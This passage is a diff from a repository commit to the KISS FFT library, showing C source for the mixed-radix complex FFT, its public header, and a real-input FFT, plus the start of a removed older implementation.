|
||||
|
||||
if(st->inverse) {
|
||||
Fout[m].r = scratch[5].r - scratch[4].i;
|
||||
Fout[m].i = scratch[5].i + scratch[4].r;
|
||||
Fout[m3].r = scratch[5].r + scratch[4].i;
|
||||
Fout[m3].i = scratch[5].i - scratch[4].r;
|
||||
}else{
|
||||
Fout[m].r = scratch[5].r + scratch[4].i;
|
||||
Fout[m].i = scratch[5].i - scratch[4].r;
|
||||
Fout[m3].r = scratch[5].r - scratch[4].i;
|
||||
Fout[m3].i = scratch[5].i + scratch[4].r;
|
||||
}
|
||||
++Fout;
|
||||
}while(--k);
|
||||
}
|
||||
|
||||
static void kf_bfly3(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
size_t m
|
||||
)
|
||||
{
|
||||
size_t k=m;
|
||||
const size_t m2 = 2*m;
|
||||
kiss_fft_cpx *tw1,*tw2;
|
||||
kiss_fft_cpx scratch[5];
|
||||
kiss_fft_cpx epi3;
|
||||
epi3 = st->twiddles[fstride*m];
|
||||
|
||||
tw1=tw2=st->twiddles;
|
||||
|
||||
do{
|
||||
C_FIXDIV(*Fout,3); C_FIXDIV(Fout[m],3); C_FIXDIV(Fout[m2],3);
|
||||
|
||||
C_MUL(scratch[1],Fout[m] , *tw1);
|
||||
C_MUL(scratch[2],Fout[m2] , *tw2);
|
||||
|
||||
C_ADD(scratch[3],scratch[1],scratch[2]);
|
||||
C_SUB(scratch[0],scratch[1],scratch[2]);
|
||||
tw1 += fstride;
|
||||
tw2 += fstride*2;
|
||||
|
||||
Fout[m].r = Fout->r - HALF_OF(scratch[3].r);
|
||||
Fout[m].i = Fout->i - HALF_OF(scratch[3].i);
|
||||
|
||||
C_MULBYSCALAR( scratch[0] , epi3.i );
|
||||
|
||||
C_ADDTO(*Fout,scratch[3]);
|
||||
|
||||
Fout[m2].r = Fout[m].r + scratch[0].i;
|
||||
Fout[m2].i = Fout[m].i - scratch[0].r;
|
||||
|
||||
Fout[m].r -= scratch[0].i;
|
||||
Fout[m].i += scratch[0].r;
|
||||
|
||||
++Fout;
|
||||
}while(--k);
|
||||
}
|
||||
|
||||
static void kf_bfly5(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
int m
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx *Fout0,*Fout1,*Fout2,*Fout3,*Fout4;
|
||||
int u;
|
||||
kiss_fft_cpx scratch[13];
|
||||
kiss_fft_cpx * twiddles = st->twiddles;
|
||||
kiss_fft_cpx *tw;
|
||||
kiss_fft_cpx ya,yb;
|
||||
ya = twiddles[fstride*m];
|
||||
yb = twiddles[fstride*2*m];
|
||||
|
||||
Fout0=Fout;
|
||||
Fout1=Fout0+m;
|
||||
Fout2=Fout0+2*m;
|
||||
Fout3=Fout0+3*m;
|
||||
Fout4=Fout0+4*m;
|
||||
|
||||
tw=st->twiddles;
|
||||
for ( u=0; u<m; ++u ) {
|
||||
C_FIXDIV( *Fout0,5); C_FIXDIV( *Fout1,5); C_FIXDIV( *Fout2,5); C_FIXDIV( *Fout3,5); C_FIXDIV( *Fout4,5);
|
||||
scratch[0] = *Fout0;
|
||||
|
||||
C_MUL(scratch[1] ,*Fout1, tw[u*fstride]);
|
||||
C_MUL(scratch[2] ,*Fout2, tw[2*u*fstride]);
|
||||
C_MUL(scratch[3] ,*Fout3, tw[3*u*fstride]);
|
||||
C_MUL(scratch[4] ,*Fout4, tw[4*u*fstride]);
|
||||
|
||||
C_ADD( scratch[7],scratch[1],scratch[4]);
|
||||
C_SUB( scratch[10],scratch[1],scratch[4]);
|
||||
C_ADD( scratch[8],scratch[2],scratch[3]);
|
||||
C_SUB( scratch[9],scratch[2],scratch[3]);
|
||||
|
||||
Fout0->r += scratch[7].r + scratch[8].r;
|
||||
Fout0->i += scratch[7].i + scratch[8].i;
|
||||
|
||||
scratch[5].r = scratch[0].r + S_MUL(scratch[7].r,ya.r) + S_MUL(scratch[8].r,yb.r);
|
||||
scratch[5].i = scratch[0].i + S_MUL(scratch[7].i,ya.r) + S_MUL(scratch[8].i,yb.r);
|
||||
|
||||
scratch[6].r = S_MUL(scratch[10].i,ya.i) + S_MUL(scratch[9].i,yb.i);
|
||||
scratch[6].i = -S_MUL(scratch[10].r,ya.i) - S_MUL(scratch[9].r,yb.i);
|
||||
|
||||
C_SUB(*Fout1,scratch[5],scratch[6]);
|
||||
C_ADD(*Fout4,scratch[5],scratch[6]);
|
||||
|
||||
scratch[11].r = scratch[0].r + S_MUL(scratch[7].r,yb.r) + S_MUL(scratch[8].r,ya.r);
|
||||
scratch[11].i = scratch[0].i + S_MUL(scratch[7].i,yb.r) + S_MUL(scratch[8].i,ya.r);
|
||||
scratch[12].r = - S_MUL(scratch[10].i,yb.i) + S_MUL(scratch[9].i,ya.i);
|
||||
scratch[12].i = S_MUL(scratch[10].r,yb.i) - S_MUL(scratch[9].r,ya.i);
|
||||
|
||||
C_ADD(*Fout2,scratch[11],scratch[12]);
|
||||
C_SUB(*Fout3,scratch[11],scratch[12]);
|
||||
|
||||
++Fout0;++Fout1;++Fout2;++Fout3;++Fout4;
|
||||
}
|
||||
}
|
||||
|
||||
/* perform the butterfly for one stage of a mixed radix FFT */
|
||||
static void kf_bfly_generic(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
int m,
|
||||
int p
|
||||
)
|
||||
{
|
||||
int u,k,q1,q;
|
||||
kiss_fft_cpx * twiddles = st->twiddles;
|
||||
kiss_fft_cpx t;
|
||||
int Norig = st->nfft;
|
||||
|
||||
kiss_fft_cpx * scratch = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC(sizeof(kiss_fft_cpx)*p);
|
||||
|
||||
for ( u=0; u<m; ++u ) {
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
scratch[q1] = Fout[ k ];
|
||||
C_FIXDIV(scratch[q1],p);
|
||||
k += m;
|
||||
}
|
||||
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
int twidx=0;
|
||||
Fout[ k ] = scratch[0];
|
||||
for (q=1;q<p;++q ) {
|
||||
twidx += fstride * k;
|
||||
if (twidx>=Norig) twidx-=Norig;
|
||||
C_MUL(t,scratch[q] , twiddles[twidx] );
|
||||
C_ADDTO( Fout[ k ] ,t);
|
||||
}
|
||||
k += m;
|
||||
}
|
||||
}
|
||||
KISS_FFT_TMP_FREE(scratch);
|
||||
}
|
||||
|
||||
static
|
||||
void kf_work(
|
||||
kiss_fft_cpx * Fout,
|
||||
const kiss_fft_cpx * f,
|
||||
const size_t fstride,
|
||||
int in_stride,
|
||||
int * factors,
|
||||
const kiss_fft_cfg st
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx * Fout_beg=Fout;
|
||||
const int p=*factors++; /* the radix */
|
||||
const int m=*factors++; /* stage's fft length/p */
|
||||
const kiss_fft_cpx * Fout_end = Fout + p*m;
|
||||
|
||||
#ifdef _OPENMP
|
||||
// use openmp extensions at the
|
||||
// top-level (not recursive)
|
||||
if (fstride==1 && p<=5)
|
||||
{
|
||||
int k;
|
||||
|
||||
// execute the p different work units in different threads
|
||||
# pragma omp parallel for
|
||||
for (k=0;k<p;++k)
|
||||
kf_work( Fout +k*m, f+ fstride*in_stride*k,fstride*p,in_stride,factors,st);
|
||||
// all threads have joined by this point
|
||||
|
||||
switch (p) {
|
||||
case 2: kf_bfly2(Fout,fstride,st,m); break;
|
||||
case 3: kf_bfly3(Fout,fstride,st,m); break;
|
||||
case 4: kf_bfly4(Fout,fstride,st,m); break;
|
||||
case 5: kf_bfly5(Fout,fstride,st,m); break;
|
||||
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
|
||||
}
|
||||
return;
|
||||
}
|
||||
#endif
|
||||
|
||||
if (m==1) {
|
||||
do{
|
||||
*Fout = *f;
|
||||
f += fstride*in_stride;
|
||||
}while(++Fout != Fout_end );
|
||||
}else{
|
||||
do{
|
||||
// recursive call:
|
||||
// DFT of size m*p performed by doing
|
||||
// p instances of smaller DFTs of size m,
|
||||
// each one takes a decimated version of the input
|
||||
kf_work( Fout , f, fstride*p, in_stride, factors,st);
|
||||
f += fstride*in_stride;
|
||||
}while( (Fout += m) != Fout_end );
|
||||
}
|
||||
|
||||
Fout=Fout_beg;
|
||||
|
||||
// recombine the p smaller DFTs
|
||||
switch (p) {
|
||||
case 2: kf_bfly2(Fout,fstride,st,m); break;
|
||||
case 3: kf_bfly3(Fout,fstride,st,m); break;
|
||||
case 4: kf_bfly4(Fout,fstride,st,m); break;
|
||||
case 5: kf_bfly5(Fout,fstride,st,m); break;
|
||||
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
|
||||
}
|
||||
}
|
||||
|
||||
/* facbuf is populated by p1,m1,p2,m2, ...
|
||||
where
|
||||
p[i] * m[i] = m[i-1]
|
||||
m0 = n */
|
||||
static
|
||||
void kf_factor(int n,int * facbuf)
|
||||
{
|
||||
int p=4;
|
||||
double floor_sqrt;
|
||||
floor_sqrt = floor( sqrt((double)n) );
|
||||
|
||||
/*factor out powers of 4, powers of 2, then any remaining primes */
|
||||
do {
|
||||
while (n % p) {
|
||||
switch (p) {
|
||||
case 4: p = 2; break;
|
||||
case 2: p = 3; break;
|
||||
default: p += 2; break;
|
||||
}
|
||||
if (p > floor_sqrt)
|
||||
p = n; /* no more factors, skip to end */
|
||||
}
|
||||
n /= p;
|
||||
*facbuf++ = p;
|
||||
*facbuf++ = n;
|
||||
} while (n > 1);
|
||||
}
|
||||
|
||||
/*
|
||||
*
|
||||
* User-callable function to allocate all necessary storage space for the fft.
|
||||
*
|
||||
* The return value is a contiguous block of memory, allocated with malloc. As such,
|
||||
* It can be freed with free(), rather than a kiss_fft-specific function.
|
||||
* */
|
||||
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem )
|
||||
{
|
||||
kiss_fft_cfg st=NULL;
|
||||
size_t memneeded = sizeof(struct kiss_fft_state)
|
||||
+ sizeof(kiss_fft_cpx)*(nfft-1); /* twiddle factors*/
|
||||
|
||||
if ( lenmem==NULL ) {
|
||||
st = ( kiss_fft_cfg)KISS_FFT_MALLOC( memneeded );
|
||||
}else{
|
||||
if (mem != NULL && *lenmem >= memneeded)
|
||||
st = (kiss_fft_cfg)mem;
|
||||
*lenmem = memneeded;
|
||||
}
|
||||
if (st) {
|
||||
int i;
|
||||
st->nfft=nfft;
|
||||
st->inverse = inverse_fft;
|
||||
|
||||
for (i=0;i<nfft;++i) {
|
||||
const double pi=3.141592653589793238462643383279502884197169399375105820974944;
|
||||
double phase = -2*pi*i / nfft;
|
||||
if (st->inverse)
|
||||
phase *= -1;
|
||||
kf_cexp(st->twiddles+i, phase );
|
||||
}
|
||||
|
||||
kf_factor(nfft,st->factors);
|
||||
}
|
||||
return st;
|
||||
}
|
||||
|
||||
|
||||
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
|
||||
{
|
||||
if (fin == fout) {
|
||||
//NOTE: this is not really an in-place FFT algorithm.
|
||||
//It just performs an out-of-place FFT into a temp buffer
|
||||
kiss_fft_cpx * tmpbuf = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC( sizeof(kiss_fft_cpx)*st->nfft);
|
||||
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
|
||||
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
|
||||
KISS_FFT_TMP_FREE(tmpbuf);
|
||||
}else{
|
||||
kf_work( fout, fin, 1,in_stride, st->factors,st );
|
||||
}
|
||||
}
|
||||
|
||||
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
|
||||
{
|
||||
kiss_fft_stride(cfg,fin,fout,1);
|
||||
}
|
||||
|
||||
|
||||
void kiss_fft_cleanup(void)
|
||||
{
|
||||
// nothing needed any more
|
||||
}
|
||||
|
||||
int kiss_fft_next_fast_size(int n)
|
||||
{
|
||||
while(1) {
|
||||
int m=n;
|
||||
while ( (m%2) == 0 ) m/=2;
|
||||
while ( (m%3) == 0 ) m/=3;
|
||||
while ( (m%5) == 0 ) m/=5;
|
||||
if (m<=1)
|
||||
break; /* n is completely factorable by twos, threes, and fives */
|
||||
n++;
|
||||
}
|
||||
return n;
|
||||
}
|
|
@ -0,0 +1,124 @@
|
|||
#ifndef KISS_FFT_H
|
||||
#define KISS_FFT_H
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <math.h>
|
||||
#include <string.h>
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
/*
|
||||
ATTENTION!
|
||||
If you would like a :
|
||||
-- a utility that will handle the caching of fft objects
|
||||
-- real-only (no imaginary time component ) FFT
|
||||
-- a multi-dimensional FFT
|
||||
-- a command-line utility to perform ffts
|
||||
-- a command-line utility to perform fast-convolution filtering
|
||||
|
||||
Then see kfc.h kiss_fftr.h kiss_fftnd.h fftutil.c kiss_fastfir.c
|
||||
in the tools/ directory.
|
||||
*/
|
||||
|
||||
#ifdef USE_SIMD
|
||||
# include <xmmintrin.h>
|
||||
# define kiss_fft_scalar __m128
|
||||
#define KISS_FFT_MALLOC(nbytes) _mm_malloc(nbytes,16)
|
||||
#define KISS_FFT_FREE _mm_free
|
||||
#else
|
||||
#define KISS_FFT_MALLOC malloc
|
||||
#define KISS_FFT_FREE free
|
||||
#endif
|
||||
|
||||
|
||||
#ifdef FIXED_POINT
|
||||
#include <sys/types.h>
|
||||
# if (FIXED_POINT == 32)
|
||||
# define kiss_fft_scalar int32_t
|
||||
# else
|
||||
# define kiss_fft_scalar int16_t
|
||||
# endif
|
||||
#else
|
||||
# ifndef kiss_fft_scalar
|
||||
/* default is float */
|
||||
# define kiss_fft_scalar float
|
||||
# endif
|
||||
#endif
|
||||
|
||||
typedef struct {
|
||||
kiss_fft_scalar r;
|
||||
kiss_fft_scalar i;
|
||||
}kiss_fft_cpx;
|
||||
|
||||
typedef struct kiss_fft_state* kiss_fft_cfg;
|
||||
|
||||
/*
|
||||
* kiss_fft_alloc
|
||||
*
|
||||
* Initialize a FFT (or IFFT) algorithm's cfg/state buffer.
|
||||
*
|
||||
* typical usage: kiss_fft_cfg mycfg=kiss_fft_alloc(1024,0,NULL,NULL);
|
||||
*
|
||||
* The return value from fft_alloc is a cfg buffer used internally
|
||||
* by the fft routine or NULL.
|
||||
*
|
||||
* If lenmem is NULL, then kiss_fft_alloc will allocate a cfg buffer using malloc.
|
||||
* The returned value should be free()d when done to avoid memory leaks.
|
||||
*
|
||||
* The state can be placed in a user supplied buffer 'mem':
|
||||
* If lenmem is not NULL and mem is not NULL and *lenmem is large enough,
|
||||
* then the function places the cfg in mem and the size used in *lenmem
|
||||
* and returns mem.
|
||||
*
|
||||
* If lenmem is not NULL and ( mem is NULL or *lenmem is not large enough),
|
||||
* then the function returns NULL and places the minimum cfg
|
||||
* buffer size in *lenmem.
|
||||
* */
|
||||
|
||||
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem);
|
||||
|
||||
/*
|
||||
* kiss_fft(cfg,in_out_buf)
|
||||
*
|
||||
* Perform an FFT on a complex input buffer.
|
||||
* for a forward FFT,
|
||||
* fin should be f[0] , f[1] , ... ,f[nfft-1]
|
||||
* fout will be F[0] , F[1] , ... ,F[nfft-1]
|
||||
* Note that each element is complex and can be accessed like
|
||||
f[k].r and f[k].i
|
||||
* */
|
||||
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout);
|
||||
|
||||
/*
|
||||
A more generic version of the above function. It reads its input from every Nth sample.
|
||||
* */
|
||||
void kiss_fft_stride(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int fin_stride);
|
||||
|
||||
/* If kiss_fft_alloc allocated a buffer, it is one contiguous
|
||||
buffer and can be simply free()d when no longer needed*/
|
||||
#define kiss_fft_free free
|
||||
|
||||
/*
|
||||
Cleans up some memory that gets managed internally. Not necessary to call, but it might clean up
|
||||
your compiler output to call this before you exit.
|
||||
*/
|
||||
void kiss_fft_cleanup(void);
|
||||
|
||||
|
||||
/*
|
||||
* Returns the smallest integer k, such that k>=n and k has only "fast" factors (2,3,5)
|
||||
*/
|
||||
int kiss_fft_next_fast_size(int n);
|
||||
|
||||
/* for real ffts, we need an even size */
|
||||
#define kiss_fftr_next_fast_size_real(n) \
|
||||
(kiss_fft_next_fast_size( ((n)+1)>>1)<<1)
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
#endif
|
|
@ -0,0 +1,159 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
|
||||
#include "kiss_fftr.h"
|
||||
#include "_kiss_fft_guts.h"
|
||||
|
||||
struct kiss_fftr_state{
|
||||
kiss_fft_cfg substate;
|
||||
kiss_fft_cpx * tmpbuf;
|
||||
kiss_fft_cpx * super_twiddles;
|
||||
#ifdef USE_SIMD
|
||||
void * pad;
|
||||
#endif
|
||||
};
|
||||
|
||||
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)
|
||||
{
|
||||
int i;
|
||||
kiss_fftr_cfg st = NULL;
|
||||
size_t subsize, memneeded;
|
||||
|
||||
if (nfft & 1) {
|
||||
fprintf(stderr,"Real FFT optimization must be even.\n");
|
||||
return NULL;
|
||||
}
|
||||
nfft >>= 1;
|
||||
|
||||
kiss_fft_alloc (nfft, inverse_fft, NULL, &subsize);
|
||||
memneeded = sizeof(struct kiss_fftr_state) + subsize + sizeof(kiss_fft_cpx) * ( nfft * 3 / 2);
|
||||
|
||||
if (lenmem == NULL) {
|
||||
st = (kiss_fftr_cfg) KISS_FFT_MALLOC (memneeded);
|
||||
} else {
|
||||
if (*lenmem >= memneeded)
|
||||
st = (kiss_fftr_cfg) mem;
|
||||
*lenmem = memneeded;
|
||||
}
|
||||
if (!st)
|
||||
return NULL;
|
||||
|
||||
st->substate = (kiss_fft_cfg) (st + 1); /*just beyond kiss_fftr_state struct */
|
||||
st->tmpbuf = (kiss_fft_cpx *) (((char *) st->substate) + subsize);
|
||||
st->super_twiddles = st->tmpbuf + nfft;
|
||||
kiss_fft_alloc(nfft, inverse_fft, st->substate, &subsize);
|
||||
|
||||
for (i = 0; i < nfft/2; ++i) {
|
||||
double phase =
|
||||
-3.14159265358979323846264338327 * ((double) (i+1) / nfft + .5);
|
||||
if (inverse_fft)
|
||||
phase *= -1;
|
||||
kf_cexp (st->super_twiddles+i,phase);
|
||||
}
|
||||
return st;
|
||||
}
|
||||
|
||||
void kiss_fftr(kiss_fftr_cfg st,const kiss_fft_scalar *timedata,kiss_fft_cpx *freqdata)
|
||||
{
|
||||
/* input buffer timedata is stored row-wise */
|
||||
int k,ncfft;
|
||||
kiss_fft_cpx fpnk,fpk,f1k,f2k,tw,tdc;
|
||||
|
||||
if ( st->substate->inverse) {
|
||||
fprintf(stderr,"kiss fft usage error: improper alloc\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ncfft = st->substate->nfft;
|
||||
|
||||
/*perform the parallel fft of two real signals packed in real,imag*/
|
||||
kiss_fft( st->substate , (const kiss_fft_cpx*)timedata, st->tmpbuf );
|
||||
/* The real part of the DC element of the frequency spectrum in st->tmpbuf
|
||||
* contains the sum of the even-numbered elements of the input time sequence
|
||||
* The imag part is the sum of the odd-numbered elements
|
||||
*
|
||||
* The sum of tdc.r and tdc.i is the sum of the input time sequence.
|
||||
* yielding DC of input time sequence
|
||||
* The difference of tdc.r - tdc.i is the sum of the input (dot product) [1,-1,1,-1...
|
||||
* yielding Nyquist bin of input time sequence
|
||||
*/
|
||||
|
||||
tdc.r = st->tmpbuf[0].r;
|
||||
tdc.i = st->tmpbuf[0].i;
|
||||
C_FIXDIV(tdc,2);
|
||||
CHECK_OVERFLOW_OP(tdc.r ,+, tdc.i);
|
||||
CHECK_OVERFLOW_OP(tdc.r ,-, tdc.i);
|
||||
freqdata[0].r = tdc.r + tdc.i;
|
||||
freqdata[ncfft].r = tdc.r - tdc.i;
|
||||
#ifdef USE_SIMD
|
||||
freqdata[ncfft].i = freqdata[0].i = _mm_set1_ps(0);
|
||||
#else
|
||||
freqdata[ncfft].i = freqdata[0].i = 0;
|
||||
#endif
|
||||
|
||||
for ( k=1;k <= ncfft/2 ; ++k ) {
|
||||
fpk = st->tmpbuf[k];
|
||||
fpnk.r = st->tmpbuf[ncfft-k].r;
|
||||
fpnk.i = - st->tmpbuf[ncfft-k].i;
|
||||
C_FIXDIV(fpk,2);
|
||||
C_FIXDIV(fpnk,2);
|
||||
|
||||
C_ADD( f1k, fpk , fpnk );
|
||||
C_SUB( f2k, fpk , fpnk );
|
||||
C_MUL( tw , f2k , st->super_twiddles[k-1]);
|
||||
|
||||
freqdata[k].r = HALF_OF(f1k.r + tw.r);
|
||||
freqdata[k].i = HALF_OF(f1k.i + tw.i);
|
||||
freqdata[ncfft-k].r = HALF_OF(f1k.r - tw.r);
|
||||
freqdata[ncfft-k].i = HALF_OF(tw.i - f1k.i);
|
||||
}
|
||||
}
|
||||
|
||||
void kiss_fftri(kiss_fftr_cfg st,const kiss_fft_cpx *freqdata,kiss_fft_scalar *timedata)
|
||||
{
|
||||
/* input buffer timedata is stored row-wise */
|
||||
int k, ncfft;
|
||||
|
||||
if (st->substate->inverse == 0) {
|
||||
fprintf (stderr, "kiss fft usage error: improper alloc\n");
|
||||
exit (1);
|
||||
}
|
||||
|
||||
ncfft = st->substate->nfft;
|
||||
|
||||
st->tmpbuf[0].r = freqdata[0].r + freqdata[ncfft].r;
|
||||
st->tmpbuf[0].i = freqdata[0].r - freqdata[ncfft].r;
|
||||
C_FIXDIV(st->tmpbuf[0],2);
|
||||
|
||||
for (k = 1; k <= ncfft / 2; ++k) {
|
||||
kiss_fft_cpx fk, fnkc, fek, fok, tmp;
|
||||
fk = freqdata[k];
|
||||
fnkc.r = freqdata[ncfft - k].r;
|
||||
fnkc.i = -freqdata[ncfft - k].i;
|
||||
C_FIXDIV( fk , 2 );
|
||||
C_FIXDIV( fnkc , 2 );
|
||||
|
||||
C_ADD (fek, fk, fnkc);
|
||||
C_SUB (tmp, fk, fnkc);
|
||||
C_MUL (fok, tmp, st->super_twiddles[k-1]);
|
||||
C_ADD (st->tmpbuf[k], fek, fok);
|
||||
C_SUB (st->tmpbuf[ncfft - k], fek, fok);
|
||||
#ifdef USE_SIMD
|
||||
st->tmpbuf[ncfft - k].i *= _mm_set1_ps(-1.0);
|
||||
#else
|
||||
st->tmpbuf[ncfft - k].i *= -1;
|
||||
#endif
|
||||
}
|
||||
kiss_fft (st->substate, st->tmpbuf, (kiss_fft_cpx *) timedata);
|
||||
}
|
|
@ -1,427 +0,0 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
|
||||
|
||||
#include "_kiss_fft_guts.h"
|
||||
/* The guts header contains all the multiplication and addition macros that are defined for
|
||||
fixed or floating point complex numbers. It also delares the kf_ internal functions.
|
||||
*/
|
||||
|
||||
static kiss_fft_cpx *scratchbuf=NULL;
|
||||
static size_t nscratchbuf=0;
|
||||
static kiss_fft_cpx *tmpbuf=NULL;
|
||||
static size_t ntmpbuf=0;
|
||||
|
||||
#define CHECKBUF(buf,nbuf,n) \
|
||||
do { \
|
||||
if ( nbuf < (size_t)(n) ) {\
|
||||
free(buf); \
|
||||
buf = (kiss_fft_cpx*)KISS_FFT_MALLOC(sizeof(kiss_fft_cpx)*(n)); \
|
||||
nbuf = (size_t)(n); \
|
||||
} \
|
||||
}while(0)
|
||||
|
||||
|
||||
static void kf_bfly2(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
int m
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx * Fout2;
|
||||
kiss_fft_cpx * tw1 = st->twiddles;
|
||||
kiss_fft_cpx t;
|
||||
Fout2 = Fout + m;
|
||||
do{
|
||||
C_FIXDIV(*Fout,2); C_FIXDIV(*Fout2,2);
|
||||
|
||||
C_MUL (t, *Fout2 , *tw1);
|
||||
tw1 += fstride;
|
||||
C_SUB( *Fout2 , *Fout , t );
|
||||
C_ADDTO( *Fout , t );
|
||||
++Fout2;
|
||||
++Fout;
|
||||
}while (--m);
|
||||
}
|
||||
|
||||
static void kf_bfly4(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
const size_t m
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx *tw1,*tw2,*tw3;
|
||||
kiss_fft_cpx scratch[6];
|
||||
size_t k=m;
|
||||
const size_t m2=2*m;
|
||||
const size_t m3=3*m;
|
||||
|
||||
tw3 = tw2 = tw1 = st->twiddles;
|
||||
|
||||
do {
|
||||
C_FIXDIV(*Fout,4); C_FIXDIV(Fout[m],4); C_FIXDIV(Fout[m2],4); C_FIXDIV(Fout[m3],4);
|
||||
|
||||
C_MUL(scratch[0],Fout[m] , *tw1 );
|
||||
C_MUL(scratch[1],Fout[m2] , *tw2 );
|
||||
C_MUL(scratch[2],Fout[m3] , *tw3 );
|
||||
|
||||
C_SUB( scratch[5] , *Fout, scratch[1] );
|
||||
C_ADDTO(*Fout, scratch[1]);
|
||||
C_ADD( scratch[3] , scratch[0] , scratch[2] );
|
||||
C_SUB( scratch[4] , scratch[0] , scratch[2] );
|
||||
C_SUB( Fout[m2], *Fout, scratch[3] );
|
||||
tw1 += fstride;
|
||||
tw2 += fstride*2;
|
||||
tw3 += fstride*3;
|
||||
C_ADDTO( *Fout , scratch[3] );
|
||||
|
||||
if(st->inverse) {
|
||||
Fout[m].r = scratch[5].r - scratch[4].i;
|
||||
Fout[m].i = scratch[5].i + scratch[4].r;
|
||||
Fout[m3].r = scratch[5].r + scratch[4].i;
|
||||
Fout[m3].i = scratch[5].i - scratch[4].r;
|
||||
}else{
|
||||
Fout[m].r = scratch[5].r + scratch[4].i;
|
||||
Fout[m].i = scratch[5].i - scratch[4].r;
|
||||
Fout[m3].r = scratch[5].r - scratch[4].i;
|
||||
Fout[m3].i = scratch[5].i + scratch[4].r;
|
||||
}
|
||||
++Fout;
|
||||
}while(--k);
|
||||
}
|
||||
|
||||
static void kf_bfly3(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
size_t m
|
